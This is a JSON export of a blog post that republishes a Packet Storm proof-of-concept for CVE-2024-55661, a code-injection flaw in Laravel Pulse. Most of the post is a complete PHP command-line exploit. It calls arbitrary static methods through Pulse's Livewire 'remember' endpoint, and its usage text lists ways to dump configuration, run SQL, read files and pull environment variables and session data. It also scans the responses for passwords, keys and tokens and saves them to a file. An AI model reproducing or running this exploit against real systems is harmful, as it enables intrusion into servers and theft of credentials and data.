{"id":31887,"date":"2025-12-18T11:45:25","date_gmt":"2025-12-18T11:45:25","guid":{"rendered":"http:\/\/localhost\/?p=31887"},"modified":"2025-12-18T11:45:25","modified_gmt":"2025-12-18T11:45:25","slug":"laravel-pulse-131-arbitrary-code-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31887","title":{"rendered":"\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032"},"content":{"rendered":"

{“lastseen”:”2025-12-18T16:36:04″,”description”:”Proof of concept exploit written in PHP for Laravel Pulse version 1.3.1. This version of Laravel Pulse suffers from an arbitrary code injection vulnerability…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:213032″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-55661″],”sourceData”:”=============================================================================================================================================\\n | # Title : Laravel Pulse 1.3.1 Arbitrary Code Injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/pulse.laravel.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/200719\/ \\u0026 \\tCVE-2024-55661 \\n \\n [+] Summary : \\n The vulnerability exists in the RemembersQueries trait within Laravel Pulse, specifically in the remember() method which improperly handles user-controlled callable parameters.\\n \\t\\t\\t\\n \\t\\t\\t\\n [+] POC : \\n #!\/usr\/bin\/env php\\n \\u003c?php\\n \/**\\n * Laravel Pulse \\u003c 1.3.1 – Arbitrary Code Injection Exploit (CVE-2024-55661)\\n * Author: Mohammed Idrees Banyamer (@banyamer_security)\\n * PHP CLI Version – indoushka\\n *\/\\n \\n if (php_sapi_name() !== ‘cli’) {\\n die(\\”\u274c This script must be run from command line only\\\\n\\”);\\n }\\n \\n class LaravelPulseExploit {\\n private $url;\\n private $component;\\n private $method;\\n private $csrf;\\n private $key;\\n private $component_id;\\n \\n public function __construct($url, $component, $method, $csrf = null, $key = ‘exploit’, $component_id = ‘abcde’) {\\n $this-\\u003eurl = rtrim($url, ‘\/’);\\n $this-\\u003ecomponent = $component;\\n $this-\\u003emethod = $method;\\n $this-\\u003ecsrf = $csrf;\\n $this-\\u003ekey = $key;\\n $this-\\u003ecomponent_id = $component_id;\\n }\\n \\n private function buildPayload() {\\n return [\\n \\”type\\” =\\u003e \\”callMethod\\”,\\n \\”method\\” =\\u003e \\”remember\\”,\\n \\”params\\” =\\u003e [$this-\\u003emethod, $this-\\u003ekey],\\n \\”id\\” =\\u003e $this-\\u003ecomponent_id,\\n \\”name\\” =\\u003e $this-\\u003ecomponent\\n ];\\n }\\n \\n public function send() {\\n $full_url = $this-\\u003eurl . ‘\/livewire\/message\/’ . $this-\\u003ecomponent;\\n $payload = $this-\\u003ebuildPayload();\\n \\n $this-\\u003eshowBanner();\\n \\n echo \\”\ud83d\udd0d [INFO] Attack Details:\\\\n\\”;\\n echo \\”\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\\\n\\”;\\n echo \\”\ud83c\udfaf Target: \\” . $this-\\u003eurl . \\”\\\\n\\”;\\n echo \\”\u2699\ufe0f Component: \\” . $this-\\u003ecomponent . \\”\\\\n\\”;\\n echo \\”\ud83d\udee0\ufe0f Method: \\” . $this-\\u003emethod . \\”\\\\n\\”;\\n echo \\”\ud83d\udd11 Key: \\” . $this-\\u003ekey . \\”\\\\n\\”;\\n echo \\”\ud83c\udd94 Component ID: \\” . $this-\\u003ecomponent_id . \\”\\\\n\\”;\\n echo \\”\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\\\n\\\\n\\”;\\n \\n echo \\”\ud83d\ude80 [*] Sending exploit to: \\” . $full_url . \\”\\\\n\\”;\\n \\n $headers = [\\n \\”Content-Type: application\/json\\”,\\n \\”X-Livewire: true\\”,\\n \\”Accept: application\/json\\”\\n ];\\n \\n if ($this-\\u003ecsrf) {\\n $headers[] = \\”X-CSRF-TOKEN: \\” . $this-\\u003ecsrf;\\n }\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $full_url,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_HTTPHEADER =\\u003e $headers,\\n CURLOPT_POSTFIELDS =\\u003e json_encode($payload),\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e 10,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $error = curl_error($ch);\\n curl_close($ch);\\n \\n if ($error) {\\n echo \\”\u274c [-] Request failed: \\” . $error . \\”\\\\n\\”;\\n exit(1);\\n }\\n \\n $this-\\u003edisplayResponse($http_code, $response);\\n }\\n \\n private function displayResponse($http_code, $response) {\\n echo \\”\\\\n\ud83d\udcca [RESULTS] Exploitation Results:\\\\n\\”;\\n echo \\”\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\\\n\\”;\\n echo \\”\ud83d\udce1 Status Code: \\” . $this-\\u003ecolorizeHttpCode($http_code) . \\”\\\\n\\”;\\n \\n if ($http_code == 200) {\\n $data = json_decode($response, true);\\n if (json_last_error() === JSON_ERROR_NONE) {\\n echo \\”\u2705 JSON decoded successfully\\\\n\\”;\\n echo \\”\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\\\n\\”;\\n \\n \/\/ Display formatted data\\n $this-\\u003edisplayFormattedData($data);\\n \\n \/\/ Search for sensitive data\\n $this-\\u003eextractSensitiveData($data);\\n \\n \/\/ Save results to file\\n $this-\\u003esaveResults($data);\\n } else {\\n echo \\”\u274c Failed to decode JSON\\\\n\\”;\\n echo \\”\ud83d\udcc4 Raw content:\\\\n\\” . $response . \\”\\\\n\\”;\\n }\\n } else {\\n echo \\”\u274c Unexpected server response\\\\n\\”;\\n echo \\”\ud83d\udcc4 Content:\\\\n\\” . $response . \\”\\\\n\\”;\\n }\\n }\\n \\n private function displayFormattedData($data) {\\n if (isset($data[‘effects’][‘html’])) {\\n echo \\”\ud83d\udcdd Retrieved HTML:\\\\n\\”;\\n echo substr($data[‘effects’][‘html’], 0, 500) . \\”…\\\\n\\”;\\n }\\n \\n if (isset($data[‘data’])) {\\n echo \\”\ud83d\udcbe Retrieved Data:\\\\n\\”;\\n foreach ($data[‘data’] as $key =\\u003e $value) {\\n if (is_string($value) \\u0026\\u0026 strlen($value) \\u003e 100) {\\n echo \\” \ud83d\udcc1 {$key}: \\” . substr($value, 0, 100) . \\”…\\\\n\\”;\\n } else {\\n echo \\” \ud83d\udcc1 {$key}: \\” . json_encode($value) . \\”\\\\n\\”;\\n }\\n }\\n }\\n }\\n \\n private function extractSensitiveData($data) {\\n echo \\”\\\\n\ud83d\udd0d [SENSITIVE DATA] Searching for sensitive information:\\\\n\\”;\\n echo \\”\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\\\n\\”;\\n \\n $sensitive_patterns = [\\n ‘password’ =\\u003e ‘\/password|pwd|pass\/i’,\\n ‘key’ =\\u003e ‘\/key|secret|token|api_key\/i’,\\n ‘database’ =\\u003e ‘\/db_|database|mysql|pgsql\/i’,\\n ‘config’ =\\u003e ‘\/config|setting|env\/i’\\n ];\\n \\n $found_data = [];\\n \\n array_walk_recursive($data, function($value, $key) use (\\u0026$found_data, $sensitive_patterns) {\\n if (is_string($key)) {\\n foreach ($sensitive_patterns as $type =\\u003e $pattern) {\\n if (preg_match($pattern, $key) \\u0026\\u0026 !empty($value)) {\\n $found_data[$type][] = [\\n ‘key’ =\\u003e $key,\\n ‘value’ =\\u003e substr(strval($value), 0, 200)\\n ];\\n }\\n }\\n }\\n });\\n \\n foreach ($found_data as $type =\\u003e $items) {\\n echo \\”\u26a0\ufe0f \\” . strtoupper($type) . \\”:\\\\n\\”;\\n foreach ($items as $item) {\\n echo \\” \u2022 {$item[‘key’]}: {$item[‘value’]}\\\\n\\”;\\n }\\n echo \\”\\\\n\\”;\\n }\\n \\n if (empty($found_data)) {\\n echo \\”\u2705 No obvious sensitive data found\\\\n\\”;\\n }\\n }\\n \\n private function saveResults($data) {\\n $filename = ‘laravel_pulse_results_’ . date(‘Y-m-d_His’) . ‘.json’;\\n file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));\\n echo \\”\ud83d\udcbe [SAVED] Results saved to: {$filename}\\\\n\\”;\\n }\\n \\n private function colorizeHttpCode($code) {\\n if ($code \\u003e= 200 \\u0026\\u0026 $code \\u003c 300) {\\n return \\”\u2705 {$code}\\”;\\n } elseif ($code \\u003e= 400 \\u0026\\u0026 $code \\u003c 500) {\\n return \\”\u26a0\ufe0f {$code}\\”;\\n } elseif ($code \\u003e= 500) {\\n return \\”\u274c {$code}\\”;\\n } else {\\n return \\”\ud83d\udd35 {$code}\\”;\\n }\\n }\\n \\n private function showBanner() {\\n echo \\”\\n \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\\n \u2502 LARAVEL PULSE EXPLOIT \u2502\\n \u2502 CVE-2024-55661 – PHP CLI \u2502\\n \u2502 Author: indoushka \u2502\\n \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\\\\n\\\\n\\”;\\n }\\n }\\n \\n function showHelp() {\\n echo \\”\\n \ud83d\udcd6 USAGE:\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n \ud83d\udee0\ufe0f Basic Usage:\\n php laravel_exploit.php -u URL -c COMPONENT -m METHOD\\n \\n \ud83d\udccb Required Options:\\n -u, –url Laravel application URL (e.g., http:\/\/example.com)\\n -c, –component Livewire component name (e.g., pulse.livewire.config-component)\\n -m, –method Static method to call\\n \\n \ud83d\udccc Additional Options:\\n -k, –key Cache key (default: exploit)\\n –csrf Optional CSRF token\\n –id Component ID (default: abcde)\\n -h, –help Show this help\\n \\n \ud83c\udfaf Practical Examples:\\n php laravel_exploit.php -u http:\/\/localhost -c pulse.livewire.config-component -m ‘\\\\\\\\\\\\Illuminate\\\\\\\\\\\\Support\\\\\\\\\\\\Facades\\\\\\\\\\\\Config::all’\\n \\n php laravel_exploit.php -u https:\/\/target.com -c pulse.livewire.config-component -m ‘\\\\\\\\\\\\Illuminate\\\\\\\\\\\\Support\\\\\\\\\\\\Facades\\\\\\\\\\\\DB::select’ -k db_test\\n \\n php laravel_exploit.php -u http:\/\/app.test -c pulse.livewire.config-component -m ‘\\\\\\\\\\\\Illuminate\\\\\\\\\\\\Support\\\\\\\\\\\\Facades\\\\\\\\\\\\File::get’ –csrf token123\\n \\n \ud83d\udd27 Common Exploitation Methods:\\n \u2022 \\\\\\\\Illuminate\\\\\\\\Support\\\\\\\\Facades\\\\\\\\Config::all – Get all configuration\\n \u2022 \\\\\\\\Illuminate\\\\\\\\Support\\\\\\\\Facades\\\\\\\\DB::select – Execute SQL queries\\n \u2022 \\\\\\\\Illuminate\\\\\\\\Support\\\\\\\\Facades\\\\\\\\File::get – Read files\\n \u2022 \\\\\\\\Illuminate\\\\\\\\Support\\\\\\\\Facades\\\\\\\\Env::get – Get environment variables\\n \u2022 \\\\\\\\Illuminate\\\\\\\\Support\\\\\\\\Facades\\\\\\\\Session::all – Get session data\\n \\n \u26a0\ufe0f Note: For ethical use in authorized penetration testing only\\n \\\\n\\”;\\n }\\n \\n function parseArguments() {\\n $options = getopt(\\”u:c:m:k:h\\”, [\\”url:\\”, \\”component:\\”, \\”method:\\”, \\”key:\\”, \\”csrf:\\”, \\”id:\\”, \\”help\\”]);\\n \\n if (isset($options[‘h’]) || isset($options[‘help’])) {\\n showHelp();\\n exit(0);\\n }\\n \\n $missing = [];\\n if (!isset($options[‘u’]) \\u0026\\u0026 !isset($options[‘url’])) $missing[] = \\”URL (-u)\\”;\\n if (!isset($options[‘c’]) \\u0026\\u0026 !isset($options[‘component’])) $missing[] = \\”Component (-c)\\”;\\n if (!isset($options[‘m’]) \\u0026\\u0026 !isset($options[‘method’])) $missing[] = \\”Method (-m)\\”;\\n \\n if (!empty($missing)) {\\n echo \\”\u274c Missing required parameters:\\\\n\\”;\\n foreach ($missing as $error) {\\n echo \\” \u2022 {$error} is required\\\\n\\”;\\n }\\n echo \\”\\\\n\\”;\\n showHelp();\\n exit(1);\\n }\\n \\n return [\\n ‘url’ =\\u003e $options[‘u’] ?? $options[‘url’] ?? null,\\n ‘component’ =\\u003e $options[‘c’] ?? $options[‘component’] ?? null,\\n ‘method’ =\\u003e $options[‘m’] ?? $options[‘method’] ?? null,\\n ‘key’ =\\u003e $options[‘k’] ?? $options[‘key’] ?? ‘exploit’,\\n ‘csrf’ =\\u003e $options[‘csrf’] ?? null,\\n ‘id’ =\\u003e $options[‘id’] ?? ‘abcde’\\n ];\\n }\\n \\n \/\/ Main execution\\n try {\\n $args = parseArguments();\\n \\n $exploit = new LaravelPulseExploit(\\n $args[‘url’],\\n $args[‘component’], \\n $args[‘method’],\\n $args[‘csrf’],\\n $args[‘key’],\\n $args[‘id’]\\n );\\n \\n $exploit-\\u003esend();\\n \\n } catch (Exception $e) {\\n echo \\”\u274c Error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n ?\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213032″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213032\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-18T16:36:04″,”description”:”Proof of concept exploit written in PHP for Laravel Pulse version 1.3.1. This version of Laravel Pulse suffers from an arbitrary code injection vulnerability…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Laravel…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-31887","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31887\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-18T16:36:04″,”description”:”Proof of concept exploit written in PHP for Laravel Pulse version 1.3.1. This version of Laravel Pulse suffers from an arbitrary code injection vulnerability…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Laravel...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31887\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-18T11:45:25+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31887#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31887\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032\",\"datePublished\":\"2025-12-18T11:45:25+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31887\"},\"wordCount\":1559,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31887#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31887\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31887\",\"name\":\"\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-18T11:45:25+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31887#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31887\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31887#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31887","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032 - zero redgem","og_description":"{“lastseen”:”2025-12-18T16:36:04″,”description”:”Proof of concept exploit written in PHP for Laravel Pulse version 1.3.1. This version of Laravel Pulse suffers from an arbitrary code injection vulnerability…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Laravel...","og_url":"https:\/\/zero.redgem.net\/?p=31887","og_site_name":"zero redgem","article_published_time":"2025-12-18T11:45:25+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31887#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31887"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032","datePublished":"2025-12-18T11:45:25+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31887"},"wordCount":1559,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31887#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31887","url":"https:\/\/zero.redgem.net\/?p=31887","name":"\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-18T11:45:25+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31887#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31887"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31887#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Laravel Pulse 1.3.1 Arbitrary Code Injection_PACKETSTORM:213032"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31887","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero